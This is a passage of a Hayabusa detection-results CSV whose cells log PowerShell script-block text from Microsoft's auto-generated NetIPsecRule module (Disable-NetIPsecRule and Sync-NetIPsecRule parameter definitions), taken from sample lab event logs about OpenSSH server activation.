($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 